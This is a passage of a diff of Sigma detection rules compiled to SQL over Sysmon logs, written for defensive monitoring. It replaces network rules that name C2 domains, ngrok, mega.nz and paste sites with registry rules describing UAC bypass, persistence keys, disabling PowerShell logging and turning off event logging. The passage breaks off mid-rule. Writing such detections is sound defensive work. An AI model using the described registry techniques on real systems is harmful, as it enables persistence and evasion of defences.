"net_connection_win_script_wan.yml" + "filename": "registry_set_lsa_disablerestrictedadmin.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon", - "id": "51eecf75-d069-43c7-9ea2-63f75499edd4", + "title": "Change User Account Associated with the FAX Service", + "id": 
"e3fdf743-f05b-4051-990a-b66919be1743", "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect change of the user account associated with the FAX service to avoid the escalation problem.", + "author": "frack113", "tags": [ - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (DestinationHostname LIKE '%akamaicontainer.com%' ESCAPE '\\' OR DestinationHostname LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azuredeploystore.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR DestinationHostname LIKE '%dunamistrd.com%' ESCAPE '\\' OR DestinationHostname LIKE '%glcloudservice.com%' ESCAPE '\\' OR DestinationHostname LIKE '%journalide.org%' ESCAPE '\\' OR DestinationHostname LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageazure.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageboxes.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officeaddons.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officestoragebox.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxsources.com%' ESCAPE '\\' OR DestinationHostname LIKE '%qwepoi123098.com%' ESCAPE '\\' OR DestinationHostname LIKE '%sbmsa.wiki%' ESCAPE '\\' OR DestinationHostname LIKE '%sourceslabs.com%' ESCAPE '\\' OR DestinationHostname LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR DestinationHostname LIKE 
'%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\Fax\\\\ObjectName' ESCAPE '\\' AND NOT (Details LIKE '%NetworkService%' ESCAPE '\\'))" ], - "filename": "net_connection_win_malware_3cx_compromise_beaconing_activity.yml" + "filename": "registry_set_fax_change_service_user.yml" }, { - "title": "Regsvr32 Network Activity", - "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", - "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "title": "Potential Signing Bypass Via Windows Developer Features - Registry", + "id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", + "status": "experimental", + "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1559.001", - "attack.defense_evasion", - "attack.t1218.010" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\AppModelUnlock%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\Appx\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\AllowAllTrustedApps' ESCAPE '\\' OR TargetObject LIKE '%\\\\AllowDevelopmentWithoutDevLicense' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_regsvr32_network_activity.yml" + "filename": 
"registry_set_turn_on_dev_features.yml" }, { - "title": "RDP Over Reverse SSH Tunnel", - "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", - "status": "test", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", - "author": "Samir Bousseaden", + "title": "Potential Persistence Via CHM Helper DLL", + "id": "976dd1f2-a484-45ec-aa1d-0e87e882262b", + "status": "experimental", + "description": "Detects when an attacker modifies the registry key \"HtmlHelp Author\" to achieve persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\HtmlHelp Author\\\\Location%' ESCAPE '\\'))" ], - "filename": "net_connection_win_rdp_reverse_tunnel.yml" + "filename": "registry_set_persistence_chm.yml" }, { - "title": "Communication To Ngrok.Io", - "id": "18249279-932f-45e2-b37a-8925f2597670", + "title": "New DNS ServerLevelPluginDll Installed", + "id": "e61e8a88-59a9-451c-874e-70fcc9740d67", "status": "experimental", - "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "description": "Detects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter 
in registry, which can be used to execute code in context of the DNS server (restart required)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ - "Legitimate use of ngrok.io" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\services\\\\DNS\\\\Parameters\\\\ServerLevelPluginDll' ESCAPE '\\')" ], - "filename": "net_connection_win_ngrok_io.yml" + "filename": "registry_set_dns_server_level_plugin_dll.yml" }, { - "title": "Suspicious Outbound RDP Connections", - "id": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", - "status": "test", - "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", - "author": "Markus Neis", + "title": "PowerShell Logging Disabled Via Registry Key Tampering", + "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", + "status": "experimental", + "description": "Detects changes to the registry for the currently logged-in user. 
In order to disable PowerShell module logging, script block logging or transcription and script execution logging", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ - "Other Remote Desktop RDP tools", - "Domain controller using dns.exe" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '3389' AND Initiated = 'true') AND NOT (((Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR Image LIKE '%\\\\RTSApp.exe' ESCAPE '\\' OR Image LIKE '%\\\\RTS2App.exe' ESCAPE '\\' OR Image LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR Image LIKE '%\\\\ws\\_TunnelService.exe' ESCAPE '\\' OR Image LIKE '%\\\\RSSensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManagerFree.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManager.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManager64.exe' ESCAPE '\\' OR Image LIKE '%\\\\mRemoteNG.exe' ESCAPE '\\' OR Image LIKE '%\\\\mRemote.exe' ESCAPE '\\' OR Image LIKE '%\\\\Terminals.exe' ESCAPE '\\' OR Image LIKE '%\\\\spiceworks-finder.exe' ESCAPE '\\' OR Image LIKE '%\\\\FSDiscovery.exe' ESCAPE '\\' OR Image LIKE '%\\\\FSAssessment.exe' ESCAPE '\\' OR Image LIKE '%\\\\MobaRTE.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Passwordstate.exe' ESCAPE '\\' OR Image LIKE '%\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\Ranger\\\\SentinelRanger.exe' ESCAPE '\\' OR Image LIKE '%\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (Image = '') OR (Image = '')))" + 
"SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\PowerShell\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\PowerShellCore\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\ModuleLogging\\\\EnableModuleLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\ScriptBlockLogging\\\\EnableScriptBlockInvocationLogging' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableTranscripting' ESCAPE '\\' OR TargetObject LIKE '%\\\\Transcription\\\\EnableInvocationHeader' ESCAPE '\\' OR TargetObject LIKE '%\\\\EnableScripts' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_rdp.yml" + "filename": "registry_set_powershell_logging_disabled.yml" }, { - "title": "Microsoft Binary Suspicious Communication Endpoint", - "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", - "status": "test", - "description": "Detects an executable in the Windows folder accessing suspicious domains", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Persistence Via Outlook Today Pages", + "id": "487bb375-12ef-41f6-baae-c6a1572b4dd1", + "status": "experimental", + "description": "Detects potential persistence activity via outlook today pages. 
An attacker can set a custom page to execute arbitrary code and link to it via the registry key \"UserDefinedUrl\".", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com/attachments/' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com/raw/' ESCAPE '\\' OR DestinationHostname LIKE '%.ghostbin.co/' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\') AND (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Today\\\\%' ESCAPE '\\') AND ((TargetObject 
LIKE '%Stamp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR TargetObject LIKE '%UserDefinedUrl' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" ], - "filename": "net_connection_win_binary_susp_com.yml" + "filename": "registry_set_persistence_outlook_todaypage.yml" }, { - "title": "Communication To Ngrok Tunneling Service", - "id": "1d08ac94-400d-4469-a82f-daee9a908849", + "title": "Registry Disable System Restore", + "id": "5de03871-5d46-4539-a82d-3aa992a69a83", "status": "experimental", - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the modification of the registry to disable a system restore on the computer", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Legitimate use of ngrok" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows NT\\\\SystemRestore%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SystemRestore%' ESCAPE '\\') AND (TargetObject LIKE '%DisableConfig' ESCAPE '\\' OR TargetObject LIKE '%DisableSR' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_ngrok_tunnel.yml" + "filename": "registry_set_disable_system_restore.yml" }, { - "title": "Communication To Mega.nz", - "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", - "status": "test", - "description": "Detects an executable accessing mega.co.nz, which could be a sign of forbidden file sharing use of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Qakbot Registry Activity", + "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", + "status": "experimental", + "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", + "author": "Hieu Tran", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate use of mega.nz uploaders and tools" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" ], - "filename": "net_connection_win_mega_nz.yml" + "filename": "registry_event_malware_qakbot_registry.yml" }, { - "title": "Suspicious Program Location with Network Connections", - "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "title": "Disable Security Events Logging Adding Reg Key MiniNt", + "id": 
"919f2ef0-be2d-4a7a-b635-eb2b41fde044", "status": "test", - "description": "Detects programs with network connections running in suspicious files system locations", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\$Recycle.bin' ESCAPE '\\' OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_prog_location_network_connection.yml" + "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" }, { - "title": "Notepad Making Network Connection", - "id": 
"e81528db-fc02-45e8-8e98-4e84aba1f10b", + "title": "Registry Entries For Azorult Malware", + "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", "status": "test", - "description": "Detects suspicious network connection by Notepad", - "author": "EagleEye Team", + "description": "Detects the presence of a registry key created during Azorult execution", + "author": "Trent Liffick", "tags": [ - "attack.command_and_control", "attack.execution", - "attack.defense_evasion", - "attack.t1055" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND NOT (DestinationPort = '9100'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" ], - "filename": "net_connection_win_notepad_network_connection.yml" + "filename": "registry_event_mal_azorult.yml" }, { - "title": "Potential Persistence Via DLLPathOverride", - "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", - "status": "experimental", - "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "DLL Load via LSASS", + "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "status": "test", + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.execution", + "attack.persistence", + "attack.t1547.008" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' 
AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" ], - "filename": "registry_set_persistence_natural_language.yml" + "filename": "registry_event_susp_lsass_dll_load.yml" }, { - "title": "Bypass UAC Using Event Viewer", - "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", - "status": "experimental", - "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", - "author": "frack113", + "title": "Suspicious Run Key from Download", + "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "status": "test", + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1547.010" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Software installers downloaded and used by users" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND 
TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" ], - "filename": "registry_set_bypass_uac_using_eventviewer.yml" + "filename": "registry_event_susp_download_run_key.yml" }, { - "title": "Potential Persistence Via Outlook Home Page", - "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", - "status": "experimental", - "description": "Detects potential persistence activity via outlook home pages.", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Pandemic Registry Key", + "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "status": "test", + "description": "Detects Pandemic Windows Implant", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 
'%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_outlook_homepage.yml" + "filename": "registry_event_apt_pandemic.yml" }, { - "title": "Modify User Shell Folders Startup Value", - "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", - "status": "experimental", - "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", - "author": "frack113", + "title": "UAC Bypass Via Wsreset", + "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "status": "test", + "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1547.001" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "registry_set_susp_user_shell_folders.yml" + "filename": "registry_event_bypass_via_wsreset.yml" }, { - "title": "RDP Sensitive Settings Changed", - "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "title": "Wdigest CredGuard Registry Modification", + "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a 
system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.persistence", "attack.t1112" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' 